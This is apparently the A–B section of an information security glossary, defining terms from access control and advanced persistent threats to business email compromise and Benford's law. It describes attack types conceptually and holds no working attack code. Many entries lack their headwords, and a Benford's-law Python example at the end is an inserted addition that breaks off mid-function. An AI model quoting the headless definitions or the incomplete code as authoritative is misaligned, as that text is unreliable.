Information Security Hyper-glossary


This hyperlinked glossary defines over 2,000 terms used in information risk,
information security, cybersecurity, governance, compliance, privacy,
business continuity and related areas.






See zero-day.


See triple-DES.

2G, 3G, 3½G, 4G, 5G …

Second and successive generations of the digital network used by devices such as cellphones/smartphones and USB modem sticks for voice calls, SMS/TXT messaging and data communications including mobile Internet access.  Defined by the ITU under the International Mobile Telecommunications-2000 (IMT-2000) and successive standards.  The 5G standards were introduced in 2017 with networks and consumer devices on the way.


Section number of the Nigerian penal code criminalizing advance fee frauds.  Often refers to other social engineering scams as well, hence email scammers are known colloquially as “419ers”.

(Authentication, Authorisation and Accounting)

The main IT security controls associated with the logon process i.e. authentication to verify the user’s claimed identity, authorisation or allocation of the user’s defined access rights and permissions, and logging key details concerning the user’s login and subsequent activities for accountability purposes.  See also I&A.

(Attribute Based Access Control)

“An access control method where subject requests to perform operations on objects are granted or denied based on assigned attributes of the subject, assigned attributes of the object, environment conditions, and a set of policies that are specified in terms of those attributes and conditions” (NIST SP800-162).

(Attribute-Based Unlinkable Entity Authentication)

A means for people to authenticate themselves anonymously, without revealing so much personal information that their identity can be ‘linked’ (inferred or determined), compromising their privacy.  See ISO/IEC 27551.


The ability of a person, computer program etc. to enter, interact with, use or misuse a controlled resource such as information, a site, building, facility, room, system, network, database, file, filing cabinet, directory, disk or other device.

Access authority

Organisation, department, person, system, program or function that determines whether to grant or deny access to controlled information assets such as personal information.  See also reference monitor.

Access card, proximity card,
pass card, access badge,
staff pass, ID card,
RFID (Radio Frequency IDentification) tag etc.

Authentication device that (normally) communicates wirelessly with a card reader (normally) located at an access controlled door or gate to determine whether the expected card holder is authorized to proceed.  Vulnerable to being lost, stolen or handed to someone else, and perhaps cloned or hacked.  Often carries the authorized holder’s photograph as well, giving alert and diligent security guards, receptionists and other workers the chance to determine at a glance whether the person presenting, wearing or using the card resembles the mugshot (assuming they have not simply replaced the photo or faked the entire pass!).

Access control

Security control intended to govern access to an asset, permitting authorized and appropriate access whilst preventing unauthorized or inappropriate access.  May be physical (such as a lock), electronic/digital (such as encryption), or procedural (such as a nightclub bouncer checking the VIP guest list for the name on your photo-ID).  Often critically important, implying the need for strong assurance that it is correctly designed, implemented, configured, operating, managed and controlled.  “Means to ensure that access to assets is authorized and restricted based on business and security requirements” (ISO/IEC 27000).

Access gateway

“A gateway that provides the system user access to multiple security domains from a single device, typically a workstation” (NZ information security manual).

Access matrix

Table relating users or their rôles (on one axis) to the IT systems, application functions and/or classes of data (on the other axis), showing the types of access permitted and/or denied (within the body of the table).

Access Point
wireless access point

Network router providing Wi-Fi services, generally on a wired LAN.  “A device that logically connects wireless client devices operating in infrastructure to one another and provides access to a distribution system, if connected, which is typically an organisation’s enterprise wired network” (NIST SP 800-48 and SP 800-121).  “Device or piece of equipment that allows wireless devices to connect to a wired network. Note: The connection uses a wireless local area network (WLAN) or related standard.” (ISO/IEC 27033-6).

Access policy,
access control policy

Security policy or a set of defined rules determining authorized and controlled access to information assets such as functions, tables or records in a database, or programs, files and directories on an IT system, or IT systems on a network, or locations (sites, buildings, rooms, cabinets etc.) holding such assets.  Typically used to configure appropriate access rights (for example read, write, delete and/or control) for user rôles which are then assigned to individual users authorized to perform those rôles (see RBAC).

Access right,
logical access right,
access permission

Individual people, systems, programs, organisations etc. may be granted or denied access to controlled resources such as data, transactions/functions or physical locations according to whether the access is authorized i.e. their logical access rights, permissions or attributes match the access rules or criteria associated with those resources according to the access policy.  May be documented in the form of an access matrix or permit.  See also right.


While information security incidents may result from deliberate acts by hackers, malware, fraudsters, spies etc., the greater proportion by number are in fact the result of inadvertent or unintentional acts, natural or chance events, or errors.  Physical accidents and health-and-safety failures that befall workers constitute information security incidents since people are information assets.

Accommodation address

Mail drop used for convenience and sometimes to conceal the true location/identity of a fraudster by giving the appearance of belonging to a legitimate business or an innocuous member of the general public.

Account hijack,
account takeover

Taking unauthorized control of a target’s bank, credit card, email, IT system or telephone account by means of hacking, social engineering, malware etc., typically as part of identity fraud or some other attack.

held to account

Someone (a person or organisation) who is held accountable for something (such as a privacy breach or some other incident) may be sanctioned in some way (‘held to account’) by an authority if they do not fulfil their obligations.  Sanctions may include penalties, disciplinary action, dismissal, prosecution, withdrawal of privileges etc.  In contrast to responsibility, accountability is a sticky property that cannot be unilaterally delegated or passed by the accountable person or organisation to another, in other words the buck stops here.  “Required or expected to justify actions or decisions; being answerable and responsible” (NZ information security manual).


Whereas normally the term implies financial accounting, the underlying principles and practices of systematically, formally and thoroughly recording and cross-checking various details such that relevant parties can be held to account for their activities are more widely applicable.  Most IT systems, for instance, can automatically record information about user logons, use of privileges and overrides, alerts, alarms and other potentially significant events in their log or accounting files, with utilities to search and report on them, even if these days they are no longer required to re-charge users for their use of the computers (common practice prior to the 1990s).


The process of checking that an organisation or individual is competent to check and certify others, to a level specified by some trusted authority.  Often confused with certification, the process of issuing certificates.  “A procedure by which an authoritative body gives formal recognition, approval and acceptance of the associated residual security risk with the operation of a system and issues a formal approval to operate the system” (NZ information security manual).


Precise, truthful and valid, faithfully representing factual reality.  An integrity property.

(Access Control List)

Security metadata associated with a computer file, directory, disk, port etc. specifying, for example, which users may or may not access or change the object’s security settings, and whether successful and/or unsuccessful attempts to do so are logged.  ACL capabilities vary between operating systems.


“Stakeholder that procures a product or service from another party.  Note: Procurement may or may not involve the exchange of monetary funds.” (ISO/IEC 27036-1).


Initial phase or activity in the process of gathering, analysing and presenting forensic evidence, or procuring a product.  “Process of creating a copy of data within a defined set.  Note: The product of an acquisition is a potential digital evidence copy.” (ISO/IEC 27037).  “Process for obtaining a product or service” (ISO/IEC 27036-1).

Active Directory
Federation Services

Proprietary Microsoft technology blending LDAP (Lightweight Directory Access Protocol) with SAML for identification and authentication, authorisation and access control purposes.

Active shooter,
active killer

Suicidal terrorist or brutally unhinged nutcase, often armed, who indiscriminately and violently attacks innocent people with intent to injure or kill as many as possible before being arrested, disabled or killed.  An extreme safety threat to everyone in the vicinity.


Microsoft technology for interactive web pages.  Malicious ActiveX controls (a form of malware) may potentially compromise the users’ systems: if the browser security settings allow, even unauthenticated (‘unsigned’) ActiveX controls may access files on the user’s hard drive for example.  Microsoft dropped ActiveX support from its browsers in 2016.


Relatively mild extremist.


A professional (typically employed by insurance companies) who uses probability theory and mathematical techniques to analyse data and so quantify and hence manage risk with scientific rigor.


Hacking/penetration testing tool.

Ad injection

Browser malware that displays advertisements and (in some cases) steals personal information from infected systems.  See also adware, XSS and HTML injection.

Administrative account

See privileged user.  “A user account with full privileges on a computer.  Such an account is intended to be used only when performing personal computer (PC) management tasks, such as installing updates and application software, managing user accounts, and modifying operating system (OS) and application settings” (NIST SP800-114 rev1).

Administrative control

See manual control and management control.  ADCON is a US Navy abbreviation.


Forensic evidence must be trustworthy if it is to be presented in court.  Evidence that is dubious for some reason (e.g. if there is reasonable doubt that it was in fact properly collected, stored and analysed in full accordance with applicable laws, regulations and standards of good forensic practice) may be ruled inadmissible by the judge and hence cannot be used to support or refute a case.

Advance fee fraud

Type of fraud in which the fraudster fools a naïve and vulnerable victim into sending money as ‘advance fees’ supposedly in order to secure a substantial payout (such as an inheritance or lottery win) or other benefit (such as an immigration visa) which, strangely enough, gets tantalizingly close but never quite materializes.  Commonly known as a 419 scam.  Originally perpetrated by letter, Telex and FAX but latterly more often by email, SMS/TXT, social media etc.  Commonplace form of social engineering.


An enemy of the organisation such as a malicious person, group or organisation.  May be a worker, fraudster, hacker, competitor, pressure group, government or terrorist, who is willing to attack and harm the organisation in some way (not necessarily physically) e.g. VXers, insider threats, lobbyists, rumour-mongers, saboteurs and cyberteurs.  A threat agent.


Annoying software that displays advertisements etc.  Considered by some to be malware since it is often covert, seldom knowingly authorized, consumes resources and may have undesirable side-effects.  See also ad injection.  “Application which pushes advertising to users and/or gathers user online behavior.  NOTE The application may or may not be installed with the user’s knowledge or consent or forced onto the user via licensing terms for other software.” (ISO/IEC 27032).

Adwind, AlienSpy, Frutas, Unrecom, Sockrat, JSocket, jRat

Heavily obfuscated species of RAT malware available to rent on the black market (MaaS).  Built using Java so it can run on Windows, Linux, Android, MacOS and other systems with Java capabilities.  Frutas was first discovered in 2012 and variants were still in the wild as of 2018.

(Advanced Encryption Standard)

‘Military grade’ cryptographic algorithm chosen by NIST in 2001 to replace DES and specified in the standard FIPS 197.  A symmetric block cipher generally understood to be strong, but widespread distrust of the NSA following Ed Snowden’s revelations casts doubt on that assertion.

Affirmative cyber risk

Cyber incidents explicitly covered in cyberinsurance or other forms of insurance.  Cf. non-affirmative cyber risk.


(a) Person who somehow (usually covertly) obtains legitimate access to confidential proprietary or personal information but betrays their position of trust by disclosing or permitting access to the information by an unauthorized third party (sometimes unwittingly), typically through a collector.  See also spy.  (b) A benign or malicious program, person or organisation acting on behalf of another, for example gathering and passing-on data from one system or network for collation and analysis centrally in conjunction with data fed by agents running on other systems or networks.

Agent provocateur

French term literally translated as ‘agent who provokes’, meaning a secret agent who infiltrates an organisation and incites them to act illegally in such a way that they are likely to be caught in the act.  A cyberteur.


Joint commitment of two or more parties to a shared objective.  “Mutual acknowledgement of terms and conditions under which a working relationship is conducted” (ISO/IEC 27036-1).


The collection of information from disparate sources, for example to profile a target.  Due to explicit and/or inferred relationships between items of information, aggregation and subsequent analysis can generate new knowledge, hence databases are usually more valuable than the unorganised data items they contain: the whole is greater than the sum of the parts.

Aircrack-ng

Wi-Fi network hacking and penetration testing tool, capable of cracking WEP, WPA and WPA2/PSK.

Air gap

Complete physical and logical separation between entities, for example isolating highly-secure networks from less-secure ones by prohibiting any connections between them.  Tends to fail-insecure, in other words if the air-gap is somehow breached, the destination tends to be highly vulnerable if excessive trust (faith) or reliance was placed on the air-gap.

Air lock, air-lock, airlock

See man trap.


Audio/visual warning of the occurrence of a critical security and/or safety condition (e.g. fire/smoke, intruder, flood, gross system integrity failure) or incident requiring an urgent, high-priority response.  See also alert.


(a) Warning that a critical system security event (e.g. audit or security log file full, system shutdown initiated, user authentication failure) has occurred.  While definitions vary, alerts generally signal important but not necessarily critical conditions requiring less urgent responses than alarms.  They are usually logged for analysis and follow-up action if and when convenient.  (b) A state of awareness, vigilance and preparedness to react appropriately to events and incidents.  “‘Instant’ indication that an information system and network may be under attack, or in danger because of accident, failure or human error” (ISO/IEC 27033-1).


Mathematical function, process and/or protocol at the heart of a cryptosystem.  Determines the specific sequence of actions or operations necessary, for example, to encrypt the plaintext and decrypt the cyphertext, or to calculate and verify a hash.

Allocated space

“Area on digital media, including primary memory, which is in use for the storage of data, including metadata” (ISO/IEC 27037).

Amplification attack,
reflection attack

Type of attack in which network servers are tricked into transmitting a large volume of traffic to a target system, potentially overloading it and causing Denial of Service.  NTP, DNS or other request packets with spoofed source IP addresses matching the target are sent to one or more network servers which then forward their responses to the target instead of the originator.  See also DRDoS.

(Active Management Technology)

Intel incorporate hardware subsystems into some of their CPU chips to facilitate low-level system management.  In May 2017, Intel disclosed a design flaw in AMT that creates a severe vulnerability allowing hackers to gain privileged access to systems using the “Q series” chipset, either locally or through the network.  The wisdom of allowing low-level privileged system management in this way, through hardware that bypasses normal BIOS and operating system security (a backdoor), is in question.


The process of systematically analysing (exploring, investigating or evaluating) something (such as risks, incidents or forensic evidence) in depth.  “Process of evaluating potential digital evidence in order to assess its relevance to the investigation.  Note: Potential digital evidence, which is determined to be relevant, becomes digital evidence.” (ISO/IEC 27042).

Analytical model

Mathematical formula for generating metrics (such as a positive trend in a relevant security parameter) from measurements (normally a time series of values of the parameter), giving meaning to the numbers (“See, things are improving!”).  “Algorithm or calculation combining one or more base measures and/or derived measures with associated decision criteria” (ISO/IEC 27000).


For ideological or other reasons, anarchists typically seek to overthrow the government and disrupt organised society by (among other things) sabotaging vulnerable parts of the critical [national] infrastructure.


A crimeware kit, in the wild in 2016.

Angry IP Scanner

Network administration/security/penetration testing tool vaguely similar to nmap.  It scans (queries) IP address and port ranges to identify network nodes.


Something different, unusual, unexpected or out of the ordinary.  While large data anomalies (such as numerous data values completely missing for a significant period) may be easily spotted by eye (provided someone is actually looking!), small anomalies in large data sets or databases can be identified much more easily and reliably by systematic statistical analysis e.g. applying Benford’s law.  Such anomalies are inherently interesting, hinting at the possibility of unexpected relationships, biases or events, perhaps even information security incidents such as bugs, flaws, frauds, malware or hacks in progress.


A person’s ability or right to go about their life and business while withholding their identity, for example whistleblowing or for privacy reasons.  Typically achieved through discretion, sometimes through a trusted third party using techniques such as anonymisation, tokenisation or redaction.


The redaction of information needed to identify specific individuals in a database, document etc. for example by tokenisation, usually for privacy reasons.


(a) Information that is not and cannot be linked unambiguously to a specific, identifiable originator or source.  (b) The name of a “hacker collective”, a loosely-organised and indistinct group or movement of pranksters, hackers, digital vigilantes and subversive hacktivists active since 2004.  Their proclamations famously include the line “We are legion” spoken in a synthetic voice emanating from a stylized mask.  See also LulzSec.


Physical security access control arrangement such as a man trap designed to prevent someone presenting their access card to open a one-person-at-a-time controlled entrance for themselves, then handing their card back to someone else (typically an unauthorized visitor) permitting them also to access the controlled area.  Electronic access control systems may keep track of people, preventing them from re-accessing an area unless they have previously exited it, requiring them to present their access cards at both entry and exit points.  “A security mechanism preventing an access card or similar device from being used to enter an area a second time without first leaving it (so that the card cannot be passed back to a second person who wants to enter).” (PCI Card Production and Provisioning Physical Security Requirements, v2.0 January 2017).

Antivirus [software, app, program, package]

Software designed to minimize the risk of malware by detecting, preventing and/or removing infections with viruses, network worms, Trojans, spyware, ransomware, rootkits etc.

(Access Point Name)

A gateway linking a mobile network to the Internet or another network.  Malware may surreptitiously alter the APN on mobile devices, redirecting users to access points monitored and controlled by hackers.


Computer system or device dedicated to a specific purpose, ready to use straight out of the box, requiring little if any configuration or management.  Consumer networking equipment such as broadband modems and access points are usually appliances, as are some commercial firewalls.  Usually built around an embedded system.  Some whiteware (household appliances) are smart.

App, application

Computer program or suite of programs providing a useful function.  Apps on smartphones, tablet and portable PCs, particularly free social media or security apps downloaded from the Web and installed by naïve users, may be Trojans, spyware, network worms or other malware, especially on jailbroken devices.

Application development, software development,
systems development

The process, method, approach, phase or stage within which new or updated software is coded (created).  Sometimes taken to include the earlier specification, architecture and design phases, and perhaps the software testing, version control, change and configuration management, and implementation activities that normally follow development.

Application services

“Software with functionality delivered on-demand to subscribers through an online model which includes web based or client-server applications” (ISO/IEC 27032).

Application whitelist

The application of whitelisting to apps. “An approach in which all executables and applications are prevented from executing by default, with an explicitly defined set of allowed executables” (NZ information security manual).

(Advanced Persistent Threat)

A highly sophisticated, sustained and ultimately damaging attack, or a series of attacks, by a very resourceful, determined and capable adversary.  Generally involves a combination of methods and tools, such as custom malware, social engineering, hacking (including hacked hardware, software or firmware, including things) and/or physical intrusion.

(Analog Risk Assessment),
(Probability Impact Graph)

Visual security metric analysing information risks in two dimensions according to their relative likelihood or probability of occurrence (on one axis) and (on the other axis) their relative severity or potential impacts on the organisation if they were to occur.  Risks that are both relatively likely and severe, or those that are heading in that direction, are generally of greater concern than the remainder and may be displayed in red or on a red background to catch the readers’ attention.


Overall grand design or blueprint for an organisation’s information systems and business processes, linking even higher level objectives from various strategies to lower-level designs for individual systems and processes.  May incorporate the information security architecture.  In the physical security context, the architectural design of a facility can enhance or hinder its security.  “Fundamental organisation of a system embodied in its components, their relationships to each other, and to the environment, and the principles guiding its design and evolution” (ISO/IEC 15288:2008, cited by ISO/IEC 27033-1).


Secure long-term storage of valuable information, designed to ensure its integrity, availability and often (but not necessarily) its confidentiality and so maintain its value.  May be required for compliance reasons e.g. organisations are obliged by applicable laws and regulations to provide certain types of business record several years after they were created.  In a few cases, the retention period is indefinite.


Strong protective plates, typically comprising layers of leather, steel, Kevlar/carbon-fibre/composite materials and ceramics that absorb and spread the energy, resisting penetration by weapons such as swords, daggers/knives, shrapnel and bullets.  The physical security version of hardening.


Deliberately setting fire to or burning something without its owner’s permission, or with intent to defraud another (such as an insurance company).  A form of sabotage.  A threat to many tangible assets.

(Address Space Layout Randomisation)

Security technique that randomizes memory addressing for processes, function calls etc., frustrating hacking attempts to invoke or replace privileged functions occupying fixed and hence predictable addresses through buffer overflows and similar exploits.  See also KASLR.

ASP (Application Service Provider)

“Operator who provides a hosted software solution that provides application services which includes web based or client-server delivery models.  EXAMPLE Online game operators, office application providers and online storage providers.” (ISO/IEC 27032).


Unilaterally state or claim something to be true, without necessarily having or providing the evidence to prove it.


Dominant, coercive, overbearing or authoritarian, able to exert strong influence on another without resorting to overt aggression or violence.  A powerful technique in many social engineering attacks as well as legitimate controlling activities (“Hands up!  You’re nicked!” for instance).


Something of value to its owner whereas if it has little, no or even negative value to its owner, or is more valuable to another, it may be a liability.  May be tangible (e.g. a building, hardware, signed/executed contract or license/approval, person, cash, IOU, padlock), intangible (e.g. knowledge, experience, know-how, skill, capability, competence, tradecraft, information, software, creative idea, concept, relationship, virtual organisation, brand, reputation, trust, loyalty, goodwill, bank credit, application or service, right or permission, understanding, verbal contract, obligation) or indeterminate sharing both tangible and intangible characteristics (e.g. trademark, patent, firmware, data, database, system, security).  See also information asset.  “Anything of value to an agency, such as IT equipment and software, information, personnel, documentation, reputation and public confidence” (NZ information security manual).  “Legal right or organisational resource which is controllable by an entity and has the capacity to generate economic benefits” (ISO 10668).  “Anything that has value to an individual, an organisation or a government” (ISO/IEC 27032).


The provision of a certain level of trust, confidence, confirmation or proof of something, typically by reviewing, checking, testing, certified compliance or auditing it.  A security-assured program, for example, has been tested to confirm that it fulfils information security requirements.


Type of cryptosystem that uses pairs of mathematically related but quite different public and private keys to either encrypt or decrypt.  Although the pairs of keys are related and are fairly simple to generate (on a computer at least), it is infeasible to guess or calculate either key from the other without additional information.  Cf. symmetric.


Code injection exploit that alters the atom tables used internally by Windows to store and communicate strings during program execution.

(Adversarial Tactics, Techniques, & Common Knowledge)

MITRE’s knowledgebase of cyber-attack tactics and techniques, first published in 2015.  See


Type of information security incident actively and deliberately perpetrated by someone (the attacker or adversary) on one or more victims (people and/or organisations) without their permission.  Cf. accident or act of god.  “Attempt to destroy, expose, alter, disable, steal or gain unauthorized access to or make unauthorized use of an asset” (ISO/IEC 27000).


Person, group or organisation actively mounting one or more attacks.  “Person deliberately exploiting vulnerabilities in technical and non-technical security controls in order to steal or compromise information systems and networks, or to compromise availability to legitimate users of information system and network resources” (ISO/IEC 27033-1).

Attack surface

A notional 3-dimensional representation of the organisation’s information assets, risks etc. where the height axis in some way reflects vulnerabilities and/or their exposure by various parts of the organisation, forming a complex and dynamic ‘surface’ that might be actively attacked or exploited by hackers, malware etc. to the corresponding extent.  Implies that improving the protection of information assets and/or reducing the exposure or extent of vulnerabilities will somehow improve the organisation’s information security … without specifying precisely how.  A security metric.  See also security landscape, risk universe, risk profile and heatmap.  “The amount of IT equipment and software used in a system.  The greater the attack surface the greater the chances are of an attacker finding an exploitable vulnerability” (NZ information security manual).

Attack toolkit

See crimeware.


The use of QRcodes, perhaps stuck over legitimate QRcodes, containing malicious JavaScript or URLs linking to infectious or phishing websites.  Exploits our inability to interpret them simply by eye.


Formally documented assertion by a duly authorized and accountable person that the organisation complies with (fulfils the requirements of) particular laws, regulations or professional practices (such as relevant governance, accounting and audit standards).  Although highly stylized and very precisely worded to exclude other liabilities, the signatories are personally accountable for the veracity of such statements, hence attestation carries a lot of weight and is taken very seriously.  A surprisingly powerful administrative control, akin to taking an oath.



Characteristic.  “Property or characteristic of an object that can be distinguished quantitatively or qualitatively by human or automated means” (ISO/IEC 27000).


(a) Acknowledgement referencing the source, originator and/or owner of intellectual property being reproduced elsewhere in order to thank them and (hopefully) reduce the risk of being accused of plagiarism or copyright abuse.  [Note: strictly speaking, attribution is irrelevant to copyright infringement but it is ethical and polite to acknowledge one’s sources.]  (b) Cybersecurity incidents are often blamed on (attributed to) certain perpetrators according to someone’s evaluation of evidence in the malware or hacking tools used, or other clues such as the demands and claims made.  However, perpetrators of illegal acts are (for obvious reasons) keen to remain undercover and may deliberately mislead the analysts by seeding false leads.  Furthermore, attacks often involve a blend of code, tools and techniques from disparate sources, obtained through the hacking underground scene and used or adapted for the specific purpose at hand.


Structured assurance process of examination, review, assessment, testing and reporting by one or more competent and trusted people who – crucially – are independent of the subject area being audited.  In many organisations, ‘audit’ also refers to the business department or function (usually “Internal Audit”, “Quality Audit” etc.) and/or third party organisation (more formally “External Audit”) responsible for auditing.  Derived from the Latin audio (to listen).  “Systematic, independent and documented process for obtaining audit evidence and evaluating it objectively to determine the extent to which the audit criteria are fulfilled.  Notes: an audit can be an internal audit (first party) or an external audit (second party or third party), and it can be a combined audit (combining two or more disciplines); ‘audit evidence’ and ‘audit criteria’ are defined in ISO 19011” (ISO/IEC 27000).  “An independent review of event logs and related activities performed to determine the adequacy of current security measures, to identify the degree of conformance with established policy or to develop recommendations for improvements to the security measures currently applied” (NZ information Security Manual).


An assurance objective for many important IT systems, processes, business relationships etc. meaning that they are capable of being audited.  Implies the need to retain high integrity records of relevant events and activities (e.g. secure logs) that can be independently reviewed if and when required.

Audit logging

“Recording of data on information security events for the purpose of review and analysis, and ongoing monitoring” (ISO/IEC 27033-1).

Audit scope

Coverage of an audit.  “Extent and boundaries of an audit” (ISO 19011:2011).

Audit tools

“Automated tools to aid the analysis of the contents of audit logs” (ISO/IEC 27033-1).

Audit trail

Chronological record of important transactions or stages in a business or ICT process, which may be used to reconstruct the exact sequence of events.  An IT system security log, for example, is typically configured to record details such as successful and failed system logons, security alarms and alerts etc. with timestamps.

(Acceptable Use Policy)

Semi-formal policy or guideline laying out and contrasting acceptable against unacceptable use of information, ICT services, systems etc. in plain English.


Control process by which a specific individual user, system, message, block of data etc. is positively identified and confirmed authentic, typically on the basis of something they know (e.g. a password) and sometimes something they have (credentials), something they are (meaning biometrics) and/or where they are (their virtual/network or physical location).  Usually involves cryptography.  Authentication is a critically important and hence inherently risky control: if the process fails, is bypassed, undermined, spoofed or disabled, many other security controls (such as access controls, audit trails, logging and alerting) are also rendered ineffective, often with no indication of anything amiss.  “Provision of assurance that a claimed characteristic of an entity is correct” (ISO/IEC 27000).


Verifiably genuine, not counterfeit or fake.  “Property that an entity is what it claims to be” (ISO/IEC 27000).


Person, rôle, organisation etc. of high status or seniority (such as a manager, regulator, government agency, tribal elder or significant other) or a stakeholder that commands respect, compliance and/or obedience, thus exerting influence or control over subordinates.


Permitted, accepted and/or agreed by management or some other authority as being in the best interests of the organisation, the workforce, the stakeholders or society at large.  Cf. unauthorized.


Some network servers advertise their services (such as multimedia or printing) by routinely broadcasting network messages, allowing them to be ‘discovered’ by other network systems.

Automated control

Control embedded in an electronic or mechanical system capable of operating automatically without necessarily involving a person in order to function.  Cf. manual control.

Autonomous weapon

A ‘fire-and-forget’ cyberweapon capable of acting autonomously or semi-autonomously using smarts (artificial intelligence) to complete complex reconnaissance, surveillance and/or combat missions with little if any direct involvement and real-time control by human operators, in contrast to remote-controlled or dumb weapons.  May be a physical device or malware.


Software tool (malware) that gives hackers or script kiddies fully privileged access to vulnerable systems.


One of the three core objectives of information security, along with confidentiality and integrity (the CIA triad).  Availability concerns the requirement for information, IT systems, people and processes to be operational and accessible when needed, implying the use of resilience and/or recovery controls to guard against unacceptable disruption or interruption of necessary services.  “Property of being accessible and usable upon demand by an authorized entity” (ISO/IEC 27000).


A global criminal botnet infrastructure used for phishing, malware distribution and money mule recruitment.


General appreciation by workers of their rôle in the process of securing the organisation’s information assets, for instance through compliance with policies, laws and other security obligations and responsibilities.  Being vigilant for, and responding appropriately to, information security threats, vulnerabilities, near misses, events and incidents is an extremely important form of control.  See also education, training and security culture.


A fundamental information security policy requirement, architectural principle or rule.  Axioms may be derived from first principles, and/or from sources such as the control objectives defined in ISO/IEC 27002 to justify and underpin the organisation’s information security policy statements, standards, procedures, guidelines and controls.


Malware species used by the Kimsuky hacker group.  Written in Visual Basic Script.

Back channel

See covert channel.


Cryptic control bypass function in a program allowing users to access the system without proper authorisation.  Sometimes coded in for legitimate software development, testing or support purposes (e.g. ‘cheat codes’ used to bypass the early stages in an electronic game or make a game character invincible, immune to attacks), occasionally for dubious, unethical, nefarious or malicious purposes (e.g. hacking, coercion, embezzlement, fraud, espionage or covert license compliance checks, or introduced by malware).

Background check

Pre-employment screening process that evaluates a new starter’s social and family background, identity, employment record, immigration status, criminal record, credit status etc. to identify security and trustworthiness issues.  A service often provided by specialist suppliers.  The nature, extent and thoroughness of the checks varies widely in practice due to legal and time constraints, privacy concerns, policy, costs and practicalities, the particular rôle etc.  See also security clearance and positive vetting.


Snapshot copy of data, programs, configurations etc. from an IT system at a given point in time.  Backups provide the ability to restore a system to a known state after an incident (such as a ransomware infection) but are generally not intended to last as long as archives.  Integrity and availability are critical concerns for backups, plus confidentiality if the information content is sensitive, hence backups must be risk-assessed and secured, normally by means of documented policies and procedures, redundancy, firesafes, off-line and off-site storage, encryption, testing to prove recoverability, oversight/monitoring etc.


One of several species of ransomware in the wild that surreptitiously encrypts victims’ data, coercing them into paying a ransom for the decryption keys.

Badge access

See access card.


Courtyard in a Mediaeval castle.


Social engineering method of [figuratively] dangling something attractive in front of victims, such as a 419 or phishing email, what appears to be a dropped/lost USB stick, or an advertisement, web page etc., typically containing malware.


Ancient social engineering trick in which a victim is enticed to purchase an attractive display item that is then surreptitiously substituted by an item of much lesser value.

Balancing control

Control that involves reconciling complementary (equal and opposite) values, as in double-entry bookkeeping etc.

Bank Trojan,
banking Trojan,
online banking Trojan,
banker Trojan

Trojan (such as Zeus) that captures user authentication credentials (typically by keylogging) or hijacks web sessions (usually via man-in-the-middle attacks) to steal funds from online bank accounts.

Barbed wire

Fencing wire with sharp barbs evenly spaced every few inches to snag the clothing and prick the skin of any intruders foolish enough to climb over.  A physical security control with some deterrent effect, though less extreme than razor wire or spikes.

Bare metal

Refers to the tangible computer hardware platform on which host operating systems, including hypervisors, run, as distinct from the virtual (simulated) hardware on which guest systems run in a virtual system.

Base measure

“Measure defined in terms of an attribute and the method for quantifying it.  Note: a base measure is functionally independent of other measures” (ISO/IEC 15939:2007).

Baseline security

The lowest permissible/acceptable level or form of security in a given situation (such as a particular organisation, physical security zone or data classification level, or a genuine security culture).  Forms a sound platform, basis or foundation on which additional security can be implemented where appropriate.  May be documented in a baseline security standard.  [Baseline:] “Information and controls that are used as a minimum implementation or starting point to provide a consistent minimum standard of systems security and information assurance” (NZ information Security Manual).

Baseline security standard

Corporate information security standard defining the ‘lowest common denominator’ controls i.e. the minimal information security control requirements that are expected to be met or exceeded in all circumstances unless formally declared exempt.

Base station,
wireless base station

“Equipment that provides the connection between mobile or cellular phones and the core communication network” (ISO/IEC 27033-6).


See shellshock.

Basic collection

CIA term for OSINT including information ‘voluntarily disclosed’ by individuals.  It is not clear what techniques are or are not permitted to ‘encourage’ individuals to ‘volunteer’ information, but at least the CIA acknowledges their use of both standard collection and special collection.

Battery backup

Electronic devices require electricity to operate normally, making them dependent on the power supply and vulnerable to power interruptions.  For devices that are at all important, power interruptions constitute a substantial risk, hence batteries are an important form of control to maintain services as long as necessary to restore the primary or standby supply.  Unfortunately, batteries bring their own risks (such as finite capacities and lifetimes, leakage of corrosive chemicals, and explosions) which must also be addressed.  See also UPS.


High walkway topping Medieval castle walls, usually crenelated, from which defenders could fire arrows, spears, stones and pour boiling oil on attackers below.


Heuristic technique based on probability theory, originally developed by Thomas Bayes, sometimes used to identify potential information security events (such as spam and malware).

Bell-LaPadula model

Formal model or architecture developed by David Elliott Bell and Leonard J. LaPadula in 1973 that applies strict (mandatory) access control rules (usually expressed as ‘no read up, no write down’ – the converse of the Biba model) and other constraints (such as the tranquillity principle) to maintain data confidentiality.  Subjects (generally programs or systems) can neither read objects (generally data) at a higher level of classification nor write to or share data with objects or subjects at lower classification levels in the hierarchy.

(Business Email Compromise), EAC
(Email Account Compromise),
“bogus boss”,
“bogus invoice”,
MITE (Man-In-The-Email)

Extremely lucrative type of social engineering attack involving misuse or falsification of email addresses, accounts or systems (e.g. through hacking, spyware or simply faking email sender addresses) to scam or defraud victims.  There are many variants, for example masquerading as a manager or supplying a false invoice in order to trick an accounts clerk to change the payee’s bank account, diverting funds into the fraudster’s money laundering mechanisms.  See also VEC.

Benford’s law

Physicist Frank Benford realized that the digits in a set of numbers (such as the values of corporate expense claims) tend to be unevenly distributed, high value digits such as 9 normally occurring less often than low ones such as 1, especially for the most significant (leftmost) digits.  Statistical analyses and tools use Benford’s law to identify data subsets with anomalous distributions, such as expense claims by a particular worker that might have been systematically and fraudulently manipulated or falsified.  One of several techniques for identifying patterns, correlations, anomalies and exceptions in databases according to the nature and distribution of the data (metadata).
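The following is an added example, not code from the glossary, showing the leading-digit test the entry describes: it compares each claimant’s first-digit frequencies against Benford’s expected proportions with a chi-square statistic and flags claimants whose amounts deviate. The claimant names, amounts and the 1% significance threshold are constructed assumptions.

```python
"""Benford's-law first-digit screening of expense claims (added example).

Honest amounts that span several orders of magnitude follow Benford's
law; a fabricated batch where someone "made up" round-ish values usually
does not. The sample data below is constructed, not real claims.
"""
from collections import Counter
import math

# Benford's expected proportion of leading digit d: log10(1 + 1/d).
BENFORD = {d: math.log10(1 + 1 / d) for d in range(1, 10)}

# Chi-square critical value, 8 degrees of freedom, 1% significance (assumed threshold).
CHI2_CRIT_8DF_P01 = 20.09


def leading_digit(value: float) -> int:
    """Most significant non-zero decimal digit of |value| (value must be non-zero)."""
    return int(f"{abs(value):.10e}"[0])   # scientific notation: first char is the digit


def first_digit_counts(values) -> dict:
    """Histogram of leading digits 1..9, ignoring zero amounts."""
    counts = Counter(leading_digit(v) for v in values if v != 0)
    return {d: counts.get(d, 0) for d in range(1, 10)}


def chi_square_vs_benford(values) -> float:
    """Pearson chi-square statistic of observed leading digits against Benford."""
    counts = first_digit_counts(values)
    n = sum(counts.values())
    if n == 0:
        return 0.0
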